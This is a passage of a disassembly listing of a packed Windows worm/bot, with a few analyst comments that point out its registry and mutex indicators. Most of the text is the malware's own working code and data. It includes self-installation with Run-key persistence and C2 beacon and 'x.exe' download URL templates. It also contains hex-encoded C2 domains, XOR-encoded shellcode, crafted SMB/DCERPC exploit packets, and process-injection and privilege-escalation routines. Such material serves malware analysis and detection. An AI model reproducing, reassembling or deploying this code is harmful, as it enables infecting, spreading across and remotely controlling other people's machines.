; the "Cryptographic Service" value under the same HKLM key used by
; sub_314229E6, releases the "uterm19" mutex handle, starts the copy with
; WinExec (show command 0) and exits the process after 1F4h ms. Only a
; failing GetSystemDirectoryA call makes it return to the caller.
; Analyst note: the autorun value name "Cryptographic Service" pointing at a
; randomly named file in the system directory is the persistence indicator.
; Attributes: bp-based frame
sub_31422A9B proc near ; CODE XREF: sub_31422B67+D1p
 ; sub_31422B67+132p
var_78 = byte ptr -78h
var_14 = byte ptr -14h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
        push ebp
        mov ebp, esp
        sub esp, 78h
        cmp [ebp+arg_0], 0
        jz short loc_31422AB0
        push [ebp+arg_0]
        call dword_31421074 ; DeleteFileA
loc_31422AB0: ; CODE XREF: sub_31422A9B+Aj
        lea eax, [ebp+var_78]
        push 63h
        push eax
        call dword_3142108C ; GetSystemDirectoryA
        test eax, eax
        jz locret_31422B65
        push esi
        call dword_314210FC ; rand
        and eax, 3
        add eax, 5 ; name length 5..8
        push eax
        lea eax, [ebp+var_14]
        push eax
        call sub_31421F73 ; random lowercase name into var_14
        mov esi, dword_31421088
        pop ecx
        pop ecx
        lea eax, [ebp+var_14]
        push offset dword_314241F0
        push eax
        call esi ; lstrcatA
        lea eax, [ebp+var_78]
        push offset dword_314241F8
        push eax
        call esi ; lstrcatA
        lea eax, [ebp+var_14]
        push eax
        lea eax, [ebp+var_78]
        push eax
        call esi ; lstrcatA
        lea eax, [ebp+var_78]
        push 0 ; overwrite an existing file
        push eax ; destination
        push [ebp+arg_4] ; source
        call dword_31421050 ; CopyFileA
        lea eax, [ebp+var_78]
        push eax
        call dword_31421084 ; lstrlenA
        inc eax ; include the terminator in the stored size
        push eax
        lea eax, [ebp+var_78]
        push eax
        push offset aCryptographicS ; "Cryptographic Service"
        push offset aSoftwareMicros ; "SOFTWARE\\Microsoft\\Windows\\CurrentVersi"...
        push 80000002h
        call sub_314228DB
        add esp, 14h
        push dword_31424FF4 ; "uterm19" mutex handle, so the new copy can take it
        call dword_3142107C ; CloseHandle
        lea eax, [ebp+var_78]
        push 0
        push eax
        call dword_31421054 ; WinExec
        push 1F4h
        call dword_31421094 ; Sleep
        push 0
        call dword_314210E0 ; ExitProcess
        pop esi
locret_31422B65: ; CODE XREF: sub_31422A9B+23j
        leave
        retn
sub_31422A9B endp

; =============== S U B R O U T I N E =======================================
; sub_31422B67 -- installation / first-run logic.
;   1. Gets the path of the running executable (var_84).
;   2. Host identifier: reads value "ID" under HKLM
;      "Software\\Microsoft\\Wireless"; if absent, generates 10..19 random
;      lowercase letters into the global buffer aFgnsdrjyrsert and stores
;      them there; if present, copies the stored value into that buffer.
;   3. Reads the "Cryptographic Service" autorun value (var_E8):
;      - absent: writes "Client" = "1" under the Wireless key and installs
;        through sub_31422A9B(0, own path)
;      - present and equal to the own path (case-insensitive): if "Client"
;        exists, sets dword_31425010 = 1 and deletes "Client"
;      - present but different: sub_31422A9B(stored path, own path), i.e.
;        delete the old file and install again
; Analyst note: the key "Software\\Microsoft\\Wireless" with values "ID" and
; "Client" is a registry indicator for this sample.
; Attributes: bp-based frame
sub_31422B67 proc near ; CODE XREF: UPX0:31422380p
var_E8 = byte ptr -0E8h
var_84 = byte ptr -84h
var_20 = byte ptr -20h
        push ebp
        mov ebp, esp
        sub esp, 0E8h
        push ebx
        push esi
        push edi
        lea eax, [ebp+var_84]
        push 63h
        push eax
        push 0
        call dword_31421048 ; GetModuleFileNameA
        test eax, eax
        jz loc_31422CA0
        and dword_31425010, 0
        lea eax, [ebp+var_20]
        push 1Dh
        push eax
        mov edi, offset aSoftwareMicr_0 ; "Software\\Microsoft\\Wireless"
        push offset aId ; "ID"
        mov esi, 80000002h
        push edi
        push esi
        call sub_31422882
        add esp, 14h
        test eax, eax
        jz short loc_31422BED ; an ID is already stored
        call dword_314210FC ; rand
        push 0Ah
        mov ebx, offset aFgnsdrjyrsert ; "fgnsdrjyrsert"
        cdq
        pop ecx
        idiv ecx
        add edx, ecx ; length = 10 + rand() % 10
        push edx
        push ebx
        call sub_31421F73 ; overwrite the global buffer with random letters
        pop ecx
        pop ecx
        push ebx
        call dword_31421084 ; lstrlenA
        inc eax
        push eax
        push ebx
        push offset aId ; "ID"
        push edi
        push esi
        call sub_314228DB
        add esp, 14h
        jmp short loc_31422BFC
; ---------------------------------------------------------------------------
loc_31422BED: ; CODE XREF: sub_31422B67+4Dj
        lea eax, [ebp+var_20]
        push eax
        push offset aFgnsdrjyrsert ; "fgnsdrjyrsert"
        call dword_31421068 ; lstrcpyA
loc_31422BFC: ; CODE XREF: sub_31422B67+84j
        lea eax, [ebp+var_E8]
        push 63h
        push eax
        push offset aCryptographicS ; "Cryptographic Service"
        push offset aSoftwareMicros ; "SOFTWARE\\Microsoft\\Windows\\CurrentVersi"...
        push esi
        call sub_31422882
        add esp, 14h
        test eax, eax
        jz short loc_31422C42 ; autorun value exists
        push 2
        push offset a1 ; "1"
        push offset aClient ; "Client"
        push edi
        push esi
        call sub_314228DB
        lea eax, [ebp+var_84]
        push eax
        push 0
        call sub_31422A9B ; does not return when the install succeeds
        add esp, 1Ch
        jmp short loc_31422CA0
; ---------------------------------------------------------------------------
loc_31422C42: ; CODE XREF: sub_31422B67+B3j
        lea eax, [ebp+var_84]
        push eax
        lea eax, [ebp+var_E8]
        push eax
        call dword_3142104C ; lstrcmpiA
        test eax, eax
        jnz short loc_31422C8B ; running from somewhere other than the installed path
        lea eax, [ebp+var_20]
        push 1Dh
        mov ebx, offset aClient ; "Client"
        push eax
        push ebx
        push edi
        push esi
        call sub_31422882
        add esp, 14h
        test eax, eax
        jnz short loc_31422CA0
        push ebx
        push edi
        push esi
        mov dword_31425010, 1 ; "Client" marker was present
        call sub_3142284D
        add esp, 0Ch
        jmp short loc_31422CA0
; ---------------------------------------------------------------------------
loc_31422C8B: ; CODE XREF: sub_31422B67+F1j
        lea eax, [ebp+var_84]
        push eax
        lea eax, [ebp+var_E8]
        push eax
        call sub_31422A9B
        pop ecx
        pop ecx
loc_31422CA0: ; CODE XREF: sub_31422B67+1Fj
 ; sub_31422B67+D9j ...
        pop edi
        pop esi
        pop ebx
        leave
        retn
sub_31422B67 endp

; =============== S U B R O U T I N E =======================================
sub_31422CA5 proc near ; CODE XREF: sub_314211A0+CAp
 ; sub_314215C7+11p ...
arg_0 = dword ptr 4 push 4 push 1000h push [esp+8+arg_0] push 0 call dword_31421044 ; VirtualAlloc retn sub_31422CA5 endp ; =============== S U B R O U T I N E ======================================= sub_31422CB9 proc near ; CODE XREF: sub_314211A0+10Bp ; sub_314215C7+C0p arg_0 = dword ptr 4 push 8000h push 0 push [esp+8+arg_0] call dword_31421040 ; VirtualFree retn sub_31422CB9 endp ; --------------------------------------------------------------------------- align 10h loc_31422CD0: ; DATA XREF: sub_31421422+Ao ; sub_314223B2+Ao jmp dword ptr loc_31421100 ; =============== S U B R O U T I N E ======================================= ; Attributes: thunk sub_31422CD6 proc near ; CODE XREF: sub_31421801+128p ; sub_31421801+134p ... jmp dword_314210F8 sub_31422CD6 endp ; =============== S U B R O U T I N E ======================================= ; Attributes: thunk sub_31422CDC proc near ; CODE XREF: sub_31421801+9Cp ; sub_31421801+C5p ... jmp dword_314210F4 sub_31422CDC endp ; =============== S U B R O U T I N E ======================================= ; Attributes: thunk sub_31422CE2 proc near ; CODE XREF: sub_31421801+93p ; sub_31421801+B2p ... 
jmp dword_314210F0 sub_31422CE2 endp ; --------------------------------------------------------------------------- align 10h ; =============== S U B R O U T I N E ======================================= sub_31422CF0 proc near ; CODE XREF: sub_31421801+8p arg_0 = byte ptr 4 push ecx cmp eax, 1000h lea ecx, [esp+4+arg_0] jb short loc_31422D10 loc_31422CFC: ; CODE XREF: sub_31422CF0+1Ej sub ecx, 1000h sub eax, 1000h test [ecx], eax cmp eax, 1000h jnb short loc_31422CFC loc_31422D10: ; CODE XREF: sub_31422CF0+Aj sub ecx, eax mov eax, esp test [ecx], eax mov esp, ecx mov ecx, [eax] mov eax, [eax+4] push eax retn sub_31422CF0 endp ; --------------------------------------------------------------------------- align 10h ; =============== S U B R O U T I N E ======================================= ; Attributes: thunk sub_31422D20 proc near ; CODE XREF: sub_3142292E+ABp jmp dword_31421064 sub_31422D20 endp ; =============== S U B R O U T I N E ======================================= ; Attributes: thunk sub_31422D26 proc near ; CODE XREF: sub_3142292E+64p jmp dword_3142105C sub_31422D26 endp ; =============== S U B R O U T I N E ======================================= ; Attributes: thunk sub_31422D2C proc near ; CODE XREF: sub_3142292E+2Dp jmp dword_31421058 sub_31422D2C endp ; --------------------------------------------------------------------------- db 2 dup(0CCh) dd 4B3h dup(0) dword_31424000 dd 206h, 2400h, 31415352h, 180h, 10001h, 11838DF5h, 2AEC5279h ; DATA XREF: sub_31421422+112o dd 0E7F63AE4h, 0E0EA9B49h, 0DB21AFBEh, 1A95447Eh, 0A032615Eh dd 9F6A1F85h, 3994FF94h, 8F26A684h, 5C1DCE35h, 0B20BC9A5h dd 3072657Ah, 0 aMozilla4_0Co_0 db 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)',0 ; DATA XREF: sub_314215C7+84o align 10h byte_31424080 db 0 ; DATA XREF: sub_314216A2+1Br off_31424081 dd offset dword_314241E4 ; DATA XREF: sub_314216A2+23r align 2 dd offset dword_314241D4 dw 0C401h dd 1314241h, 314241B4h, 4241A000h, 41900131h, 80013142h dd 314241h, 31424174h, 42416800h, 
41580131h, 48003142h dd 1314241h, 3142413Ch, 42417400h, 41D40131h, 30003142h dd 314241h, 314241D4h, 42412001h, 41480031h, 10013142h dd 314241h, 31424130h, 42410001h, 40F80131h, 74003142h dd 314241h, 31424130h, 2E767663h, 7572h, 2E777777h, 6C646572h dd 2E656E69h, 7572h, 656C6966h, 72616573h, 722E6863h, 75h dd 6F626F72h, 61686378h, 2E65676Eh, 6D6F63h, 68746566h dd 2E647261h, 7A6962h, 63657361h, 2E616B68h, 7572h, 7473616Dh dd 782D7265h, 6D6F632Eh, 0 dd 6F6C6F63h, 61622D72h, 722E6B6Eh, 75h, 6B76616Bh, 742E7A61h dd 76h, 74757263h, 6E2E706Fh, 75h, 6F64696Bh, 61622D73h dd 722E6B6Eh, 75h, 65726170h, 61622D78h, 722E6B6Eh, 75h dd 6C756461h, 6D652D74h, 65726970h, 6D6F632Eh, 0 dd 666E6F6Bh, 616B7369h, 726F2E74h, 67h, 69746963h, 6E61622Dh dd 75722E6Bh, 0 dword_314241D4 dd 72617778h, 6A632E65h, 656E2E62h, 74hdword_314241E4 dd 617A616Dh, 616B6166h, 75722Ehdword_314241F0 dd 6578652Eh, 0 ; sub_3142207E+55o ... dword_314241F8 dd 5Ch ; sub_31422A9B+56o aMozilla4_0Comp db 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)',0 ; DATA XREF: sub_314211A0+13o align 10h aAbcdefghijkl_0 db 'abcdefghijklmnopqrstuvwxyz',0 ; DATA XREF: sub_31421316+1Co align 4 aAbcdefghijklmn db 'ABCDEFGHIJKLMNOPQRSTUVWXYZ',0 ; DATA XREF: sub_31421316+Co align 4 aZer0 db 'zer0',0 ; DATA XREF: sub_31421422+34o align 10h aHttpS db 'http://%s',0 ; DATA XREF: sub_314215C7+71o align 4 aHttpSIndex_php db 'http://%s/index.php?id=%s&scn=%d&inf=%d&ver=19&cnt=%s',0 ; DATA XREF: sub_314215C7+57o align 8 byte_314242B8 db 0EBh ; DATA XREF: sub_31421801+24Eo ; sub_31421801+260o ... 
db 58h word_314242BA dw 7468h ; DATA XREF: sub_31422712+40o dd 2F3A7074h, 3732312Fh, 302E302Eh, 383A312Eh, 652F3030h dd 6578652Eh, 4 dup(0DFDFDFDFh), 7A6F4DDFh, 616C6C69h dd 302E342Fh, 0C9335DDFh, 1EEB966h, 8B05758Dh, 3C068AFEh dd 46057599h, 302C068Ah, 88993446h, 0EDE24707h, 0DAE80AEBh dd 2EFFFFFFh, 2E676562h, 0C9999371h, 0C999C999h, 91BDFD12h dd 0C99916FDh, 0AA6872C1h, 0AA66FD42h, 14BA10FDh, 9998A91Ch dd 0C9C999C9h, 98F198F3h, 9986C999h, 98C071C9h, 0C999C999h dd 37CB5F90h, 1C965992h, 99C99978h, 14C999C9h, 7D7157E4h dd 0C999C999h, 0E414C999h, 9945713Ah, 99C999C9h, 0F19DF3C9h dd 9989C999h, 0F1C999C9h, 0C999C999h, 0F3C9999Ch, 0B371C999h dd 99C99998h, 0E3F367C9h, 0DC1C10F0h, 99C99998h, 0C959B2C9h dd 0C99BF3C9h, 0C999F1C9h, 0C999C999h, 0A10414D9h, 99C99998h dd 9E71CAC9h, 99C99998h, 61688DC9h, 0AD1C1091h, 99C99998h dd 66611AC9h, 99111D96h, 99C999C9h, 0C850B2C9h, 98F3C8C8h dd 0C957DC14h, 0C9992571h, 0C999C999h, 91C0A44Eh, 59924912h dd 59B2F7EDh, 0C9C9C9C9h, 0CA3AC414h, 993B71CBh, 99C999C9h dd 0E424FFC9h, 0ED599221h, 0F1CDCDCFh, 0C999C999h, 66C9999Ch dd 9998DC2Ch, 0C9C999C9h, 0C9991E71h, 0C999C999h, 83B8B0FBh dd 5D12CDC3h, 0C9C999F3h, 0DC2C66CBh, 99C99998h, 0AD2C66C9h dd 99C99998h, 990B71C9h, 99C999C9h, 0A6485AC9h, 2C66C096h dd 0C99998ADh, 1B71C999h, 0C999C999h, 294CC999h, 9CF3EBA7h dd 98A10414h, 0C999C999h, 99E971CAh, 99C999C9h, 26F434C9h dd 0C999F371h, 0C999FC71h, 0C999C999h, 0EF133BF9h, 376B4629h dd 9966DE5Fh, 0A8EC5AC9h, 99C999A0h, 99C999C9h, 0B7C999C9h dd 0E9EDFFC5h, 0B7FDE9ECh, 99FCE1FCh, 6 dup(99C999C9h) dd 0FCF5CAC9h, 0C999E9FCh, 0F7EBFCF2h, 0ABAAF5FCh, 34C7C999h dd 0B459AAF9h, 662A2A25h, 9093ACC9h, 9CC9B781h, 83639D90h dd 9271CDC9h, 0C999C999h, 19BFC999h, 0FD145135h, 720A95BDh dd 0F934C791h, 0C999C871h, 0C999C999h, 12A5D212h, 9AE180D5h dd 146FAA52h, 0C89A2A8Dh, 9A8B12B9h, 5859AA4Ah, 9BAB9E59h dd 99A319DBh, 0A26CECC9h, 0ED85BDDDh, 0E8A2DF9Eh, 5544EB81h dd 9ABDC812h, 8D2E964Ah, 85D812EBh, 9D125A9Ah, 105A9A09h dd 0F885BDDDh, 98D01C10h, 0C999C999h, 7F664966h, 
8712FEFDh dd 12C999A9h, 0C21295C2h, 12821285h, 0B75A91C2h, 0B7FDF7FCh dd 0 dword_31424580 dd 85000000h, 424D53FFh, 72h, 0C8531800h, 3 dup(0) ; DATA XREF: sub_31421801+186o dd 0FEFF0000h, 0 dd 2006200h aPcNetworkProgr db 'PC NETWORK PROGRAM 1.0',0 db 2 db 4Ch ; L db 41h, 4Eh, 4Dh db 41h ; A db 4Eh, 31h, 2Eh db 30h ; 0 align 2 dw 5702h aIndowsForWorkg db 'indows for Workgroups 3.1a',0 db 2 dd 2E314D4Ch, 30305832h, 4C020032h, 414D4E41h, 312E324Eh dd 544E0200h, 204D4C20h, 32312E30h, 0 dword_3142460C dd 0A4000000h, 424D53FFh, 73h, 0C8071800h, 3 dup(0) ; DATA XREF: sub_31421801+1BAo dd 0FEFF0000h, 100000h, 0A400FF0Ch, 0A110400h, 0 dd 20000000h, 0 dd 0D400h, 4E006980h, 534D4C54h, 1005053h, 97000000h, 0E00882h dd 4 dup(0) aWindows2000219: unicode 0, <Windows 2000 2195>,0 aWindows20005_0: unicode 0, <Windows 2000 5.0>,0 align 8 dword_314246B8 dd 0DA000000h, 424D53FFh, 73h, 0C8071800h, 3 dup(0) ; DATA XREF: sub_31421801+1EEo dd 0FEFF0000h, 200800h, 0DA00FF0Ch, 0A110400h, 0 dd 57000000h, 0 dd 0D400h, 4E009F80h, 534D4C54h, 3005053h, 1000000h, 46000100h dd 0 dd 47000000h, 0 dd 40000000h, 0 dd 40000000h, 6000000h, 40000600h, 10000000h, 47001000h dd 15000000h, 48E0888Ah, 44004F00h, 19810000h, 0E4F27A6Ah dd 0AF281C49h, 10742530h, 575367h, 6E0069h, 6F0064h, 730077h dd 320020h, 300030h, 200030h, 310032h, 350039h, 570000h dd 6E0069h, 6F0064h, 730077h, 320020h, 300030h, 200030h dd 2E0035h, 30h, 0 dword_31424798 dd 5C000000h, 424D53FFh, 75h, 0C8071800h, 3 dup(0) ; DATA XREF: sub_31421801+8Do dd 0FEFF0000h, 300800h, 5C00FF04h, 1000800h, 3100h, 5C005Ch dd 390031h, 2E0032h, 360031h, 2E0038h, 2E0031h, 310032h dd 5C0030h, 500049h aC: ; DATA XREF: sub_31421801+BFo unicode 0, <C$>,0 a????? 
db '?????',0 dd 0 dword_314247FC dd 64000000h, 424D53FFh, 0A2h, 0C8071800h, 3 dup(0) ; DATA XREF: sub_31421801+2D4o dd 4DC0800h, 400800h, 0DE00FF18h, 0E00DEh, 16h, 0 dd 2019Fh, 3 dup(0) dd 3, 1, 40h, 2, 1103h, 6C005Ch, 610073h, 700072h, 63h dd 0 dword_31424868 dd 9C000000h, 424D53FFh, 25h, 0C8071800h, 3 dup(0) ; DATA XREF: sub_31421801+308o dd 4DC0800h, 500800h, 48000010h, 0 dd 4, 2 dup(0) dd 48005400h, 2005400h, 2600h, 10005940h, 50005Ch, 500049h dd 5C0045h, 0 dd 30B0005h, 10h, 48h, 1, 10B810B8h, 0 dd 1, 10000h, 3919286Ah, 11D0B10Ch, 0C000A89Bh, 0F52ED94Fh dd 0 dd 8A885D04h, 11C91CEBh, 8E89Fh, 6048102Bh, 2, 0 dword_3142490C dd 0F40C0000h, 424D53FFh, 25h, 0C8071800h, 3 dup(0) ; DATA XREF: sub_31421801+4EEo dd 4DC0800h, 600800h, 0A0000010h, 0Ch, 4, 2 dup(0) dd 0A0005400h, 200540Ch, 2600h, 100CB140h, 50005Ch, 500049h dd 5C0045h, 0 dd 3000005h, 10h, 0CA0h, 1, 0C88h, 90000h, 3ECh, 0 dd 3ECh, 0 dword_3142498C dd 401495h, 3, 40707Ch, 1, 0 dd 1, 0 dd 1, 0 dd 1, 0 dd 1, 0 dd 1, 0 dd 1, 0 dd 1, 0 dd 40707Ch, 1, 0 dd 1, 0 dd 40707Ch, 1, 0 dd 1, 0 dd 40707Ch, 1, 0 dd 1, 0 dd 138578h, 0E9A65BABh, 0 dword_31424A20 dd 0F8100000h, 424D53FFh, 2Fh, 0C8071800h, 3 dup(0) ; DATA XREF: sub_31421801+347o dd 0FEFF0800h, 600800h, 0DE00FF0Eh, 4000DEh, 0FF000000h dd 8FFFFFFh, 10B800h, 4010B800h, 0 dd 0EE10B900h, 1000005h, 10h, 10B8h, 1, 200Ch, 90000h dd 0DADh, 0 dd 0DADh, 0 dword_31424A8C dd 0D80F0000h, 424D53FFh, 25h, 0C8071800h, 3 dup(0) ; DATA XREF: sub_31421801+372o dd 1180800h, 700800h, 84000010h, 0Fh, 4, 2 dup(0) dd 84005400h, 200540Fh, 2600h, 0F9540h, 50005Ch, 500049h dd 5C0045h, 0 dd 2000005h, 10h, 0F84h, 1, 0F6Ch, 90000h, 0 dword_31424B00 dd 0 dd 40A89Ah, 1, 0 dd 1, 0 dd 1, 0 dd 1, 0 dd 1, 0 dd 1, 0 dd 1, 0 dd 1, 0 dd 40A89Ah, 1, 0 dd 1, 0 dd 40A89Ah, 1, 0 dd 1, 0 dd 40A89Ah, 1, 0 dd 1, 3 dup(0) dd 586E6957h, 72502050h, 6Fh, 9 dup(0) db 2 dup(0) dword_31424BBE dd 1004600h dw 1 dd 69570000h, 206B326Eh, 6F7250h, 0Ah dup(0) dword_31424BF8 dd 7515123Ch, 2, 326E6957h, 5341206Bh, 0Ah 
dup(0) ; DATA XREF: sub_31421801+41Bo ; sub_31421801+45Do dd 123C0000h, 751Ch, 0Eh dup(0) ; --------------------------------------------------------------------------- loc_31424C70: ; DATA XREF: sub_31421801+44Ao jmp short loc_31424C78 ; --------------------------------------------------------------------------- jmp short loc_31424C7A ; --------------------------------------------------------------------------- align 8 loc_31424C78: ; CODE XREF: UPX0:loc_31424C70j ; DATA XREF: sub_31421801+5Co pop esp pop esp loc_31424C7A: ; CODE XREF: UPX0:31424C72j and eax, 70695C73h arpl [eax+eax], sp ; --------------------------------------------------------------------------- dw 0 dword_31424C84 dd 1CEC8166h dword_31424C88 dd 0E4FF07h aSedebugprivile db 'SeDebugPrivilege',0 ; DATA XREF: sub_31421D68+62o align 10h aAdjusttokenpri db 'AdjustTokenPrivileges',0 ; DATA XREF: sub_31421D68+39o align 4 aLookupprivileg db 'LookupPrivilegeValueA',0 ; DATA XREF: sub_31421D68+2Ao align 10h aOpenprocesstok db 'OpenProcessToken',0 ; DATA XREF: sub_31421D68+1Bo align 4 aAdvapi32 db 'advapi32',0 ; DATA XREF: sub_31421D68+8o ; sub_314223B2+12Co align 10h aUterm19 db 'uterm19',0 ; DATA XREF: sub_31421DF0:loc_31421ED5o ; UPX0:31422351o ... 
aShell_traywnd db 'Shell_TrayWnd',0 ; DATA XREF: sub_31421DF0+58o align 4 aCreateremoteth db 'CreateRemoteThread',0 ; DATA XREF: sub_31421DF0:loc_31421E37o align 4 aVirtualallocex db 'VirtualAllocEx',0 ; DATA XREF: sub_31421DF0+34o align 4 aKernel32 db 'kernel32',0 ; DATA XREF: sub_31421DF0+18o align 4 dword_31424D38 dd 0E9F3F5h aHttp1_1200Ok db 'HTTP/1.1 200 OK',0Dh,0Ah ; DATA XREF: sub_3142207E+106o db 0Dh,0Ah db 0Dh,0Ah,0 align 4 aContentLengthU db 'Content-Length: %u',0Dh,0Ah ; DATA XREF: sub_3142207E+85o db 0Dh,0Ah,0 align 4 aHttp1_1200OkCo db 'HTTP/1.1 200 OK',0Dh,0Ah ; DATA XREF: sub_3142207E+71o db 'Content-Type: application/x-exe-compressed',0Dh,0Ah,0 align 4 aGet db 'GET',0 ; DATA XREF: sub_3142207E+3Do aFtpupd_exe db 'ftpupd.exe',0 ; DATA XREF: UPX0:3142233Co align 4 aUser32 db 'user32',0 ; DATA XREF: sub_314223B2+133o align 4 aMsvcrt db 'msvcrt',0 ; DATA XREF: sub_314223B2+125o align 4 aWininet db 'wininet',0 ; DATA XREF: sub_314223B2+11Eo aWs2_32 db 'ws2_32',0 ; DATA XREF: sub_314223B2+111o align 4 aU19x db 'u19x',0 ; DATA XREF: sub_314223B2+BDo align 4 aU19 db 'u19',0 ; DATA XREF: sub_314223B2+B6o aU18 db 'u18',0 ; DATA XREF: sub_314223B2+AFo aU17 db 'u17',0 ; DATA XREF: sub_314223B2+A8o aU16 db 'u16',0 ; DATA XREF: sub_314223B2+A1o aU15 db 'u15',0 ; DATA XREF: sub_314223B2+9Ao aU14 db 'u14',0 ; DATA XREF: sub_314223B2+93o aU13i db 'u13i',0 ; DATA XREF: sub_314223B2+8Co align 4 aU13 db 'u13',0 ; DATA XREF: sub_314223B2+85o aU12 db 'u12',0 ; DATA XREF: sub_314223B2+7Eo aU11 db 'u11',0 ; DATA XREF: sub_314223B2+77o aU10 db 'u10',0 ; DATA XREF: sub_314223B2+70o aU9 db 'u9',0 ; DATA XREF: sub_314223B2+69o align 4 aU8 db 'u8',0 ; DATA XREF: sub_314223B2+62o align 4 aU18x db 'u18x',0 ; DATA XREF: sub_314223B2+5Bo align 4 aU17x db 'u17x',0 ; DATA XREF: sub_314223B2+54o align 4 aU16x db 'u16x',0 ; DATA XREF: sub_314223B2+4Do align 4 aU15x db 'u15x',0 ; DATA XREF: sub_314223B2+46o align 4 aU14x db 'u14x',0 ; DATA XREF: sub_314223B2+3Fo align 4 aU13x db 
'u13x',0 ; DATA XREF: sub_314223B2+38o align 4 aU12x db 'u12x',0 ; DATA XREF: sub_314223B2+31o align 4 aU11x db 'u11x',0 ; DATA XREF: sub_314223B2+2Ao align 4 aU10x db 'u10x',0 ; DATA XREF: sub_314223B2+23o align 4 aHttpSDX_exe db 'http://%s:%d/x.exe',0 ; DATA XREF: sub_31422712+2Do align 4 aSoftwareMicros db 'SOFTWARE\Microsoft\Windows\CurrentVersion\Run',0 ; DATA XREF: sub_314221C4+23o ; sub_314229E6+66o ... align 4 aCryptographicS db 'Cryptographic Service',0 ; DATA XREF: sub_314221C4+1Co ; sub_31422A9B+87o ... align 10h aFgnsdrjyrsert db 'fgnsdrjyrsert',0 ; DATA XREF: sub_314215C7+4Fo ; sub_31422B67+57o ... align 10h dd 2 dup(0) aSoftwareMicr_0 db 'Software\Microsoft\Wireless',0 ; DATA XREF: sub_31422B67+32o aClient db 'Client',0 ; DATA XREF: sub_31422B67+BCo ; sub_31422B67+F8o align 4 aId db 'ID',0 ; DATA XREF: sub_31422B67+37o ; sub_31422B67+75o align 10h aWindowsUpdate db 'Windows Update',0 ; DATA XREF: sub_314229E6+55o align 10h aMsConfigV13 db 'MS Config v13',0 ; DATA XREF: sub_314229E6+4Eo align 10h aAvserve2_exeup db 'avserve2.exeUpdate Service',0 ; DATA XREF: sub_314229E6+47o align 4 aAvserve_exe db 'avserve.exe',0 ; DATA XREF: sub_314229E6+40o aWindowsUpdateS db 'Windows Update Service',0 ; DATA XREF: sub_314229E6+39o align 10h aWinupdate db 'WinUpdate',0 ; DATA XREF: sub_314229E6+32o align 4 aSystray db 'SysTray',0 ; DATA XREF: sub_314229E6+2Bo aBotLoader db 'Bot Loader',0 ; DATA XREF: sub_314229E6+24o align 10h aSystemRestoreS db 'System Restore Service',0 ; DATA XREF: sub_314229E6+1Do align 4 aDiskDefragment db 'Disk Defragmenter',0 ; DATA XREF: sub_314229E6+16o align 4 aWindowsSecurit db 'Windows Security Manager',0 ; DATA XREF: sub_314229E6+Fo align 4 a1: ; DATA XREF: sub_31422B67+B7o unicode 0, <1>,0 dd 7 dup(0) dword_31424FE8 dd 0 ; sub_314221C4+80w dword_31424FEC dd 0 ; sub_314216A2+53o ... dword_31424FF0 dd 0 ; sub_3142207E:loc_3142212Cr ... dword_31424FF4 dd 0 ; UPX0:3142235Cw ... 
dword_31424FF8 dd 0 ; sub_314223B2+CEw dword_31424FFC dd 0 ; sub_31422712+20r dword_31425000 dd 31420000h ; UPX0:31422341w dword_31425004 dd 0 ; sub_314216A2+4Ao ... dword_31425008 dd 0 ; UPX0:314227C1w word_3142500C dw 0 ; DATA XREF: sub_3142255F+3Br ; sub_314225C3:loc_31422624r ... align 10h dword_31425010 dd 0 ; sub_31422B67+110w align 1000h UPX0 ends ; Section 2. (virtual address 00006000) ; Virtual size : 00002000 ( 8192.) ; Section size in file : 00002000 ( 8192.) ; Offset to raw data for section: 00006000 ; Flags E0000060: Text Data Executable Readable Writable ; Alignment : default ; =========================================================================== ; Segment type: Pure code ; Segment permissions: Read/Write/Execute UPX1 segment para public 'CODE' use32 assume cs:UPX1 ;org 31426000h assume es:nothing, ss:nothing, ds:UPX0, fs:nothing, gs:nothing dword_31426000 dd 0C4h, 40h, 72695601h, 6C617574h, 65657246h, 69560100h ; DATA XREF: UPX1:31427BB1o dd 61757472h, 6C6C416Ch, 100636Fh, 4D746547h, 6C75646Fh dd 6C694665h, 6D614E65h, 1004165h, 7274736Ch, 69706D63h dd 43010041h, 4679706Fh, 41656C69h, 69570100h, 6578456Eh dd 43010063h, 74616572h, 6F6F5465h, 6C65686Ch, 53323370h dd 7370616Eh, 746F68h, 6F725001h, 73736563h, 69463233h dd 747372h, 72655401h, 616E696Dh, 72506574h, 7365636Fh dd 50010073h, 65636F72h, 32337373h, 7478654Eh, 736C0100h dd 70637274h, 1004179h, 61657243h, 76456574h, 41746E65h dd 61570100h, 6F467469h, 6E695372h, 4F656C67h, 63656A62h dd 44010074h, 74656C65h, 6C694665h, 1004165h, 74697257h dd 6C694665h, 43010065h, 65736F6Ch, 646E6148h, 100656Ch dd 61657243h, 69466574h, 41656Ch, 74736C01h, 6E656C72h dd 6C010041h, 63727473h, 417461h, 74654701h, 74737953h dd 69446D65h, 74636572h, 4179726Fh, 65470100h, 636F4C74h dd 49656C61h, 416F666Eh, 6C530100h, 706565h, 746E4901h dd 6F6C7265h, 64656B63h, 68637845h, 65676E61h, 736C0100h dd 70637274h, 416E79h, 74654701h, 72727543h, 50746E65h dd 65636F72h, 1007373h, 50746547h, 41636F72h, 65726464h dd 1007373h, 
64616F4Ch, 7262694Ch, 41797261h, 72570100h dd 50657469h, 65636F72h, 654D7373h, 79726F6Dh, 704F0100h dd 72506E65h, 7365636Fh, 47010073h, 6F4D7465h, 656C7564h dd 646E6148h, 41656Ch, 74654701h, 6B636954h, 6E756F43h dd 43010074h, 74616572h, 74754D65h, 417865h, 65724301h dd 54657461h, 61657268h, 43010064h, 74616572h, 6F725065h dd 73736563h, 53010041h, 76457465h, 746E65h, 65704F01h dd 6576456Eh, 41746Eh, 69784501h, 72685474h, 646165h, 746E4901h dd 6F6C7265h, 64656B63h, 72636E49h, 6E656D65h, 52010074h dd 46646165h, 656C69h, 74654701h, 656C6946h, 657A6953h dd 78450100h, 72507469h, 7365636Fh, 47010073h, 614C7465h dd 72457473h, 726F72h, 0D100h, 0 dd 65520100h, 65724367h, 4B657461h, 78457965h, 52010041h dd 65536765h, 6C615674h, 78456575h, 52010041h, 75516765h dd 56797265h, 65756C61h, 417845h, 67655201h, 6E65704Fh dd 4579654Bh, 1004178h, 44676552h, 74656C65h, 6C615665h dd 416575h, 67655201h, 736F6C43h, 79654B65h, 62410100h dd 5374726Fh, 65747379h, 7568536Dh, 776F6474h, 100416Eh dd 70797243h, 65724374h, 48657461h, 687361h, 79724301h dd 61487470h, 61446873h, 1006174h, 70797243h, 72655674h dd 53796669h, 616E6769h, 65727574h, 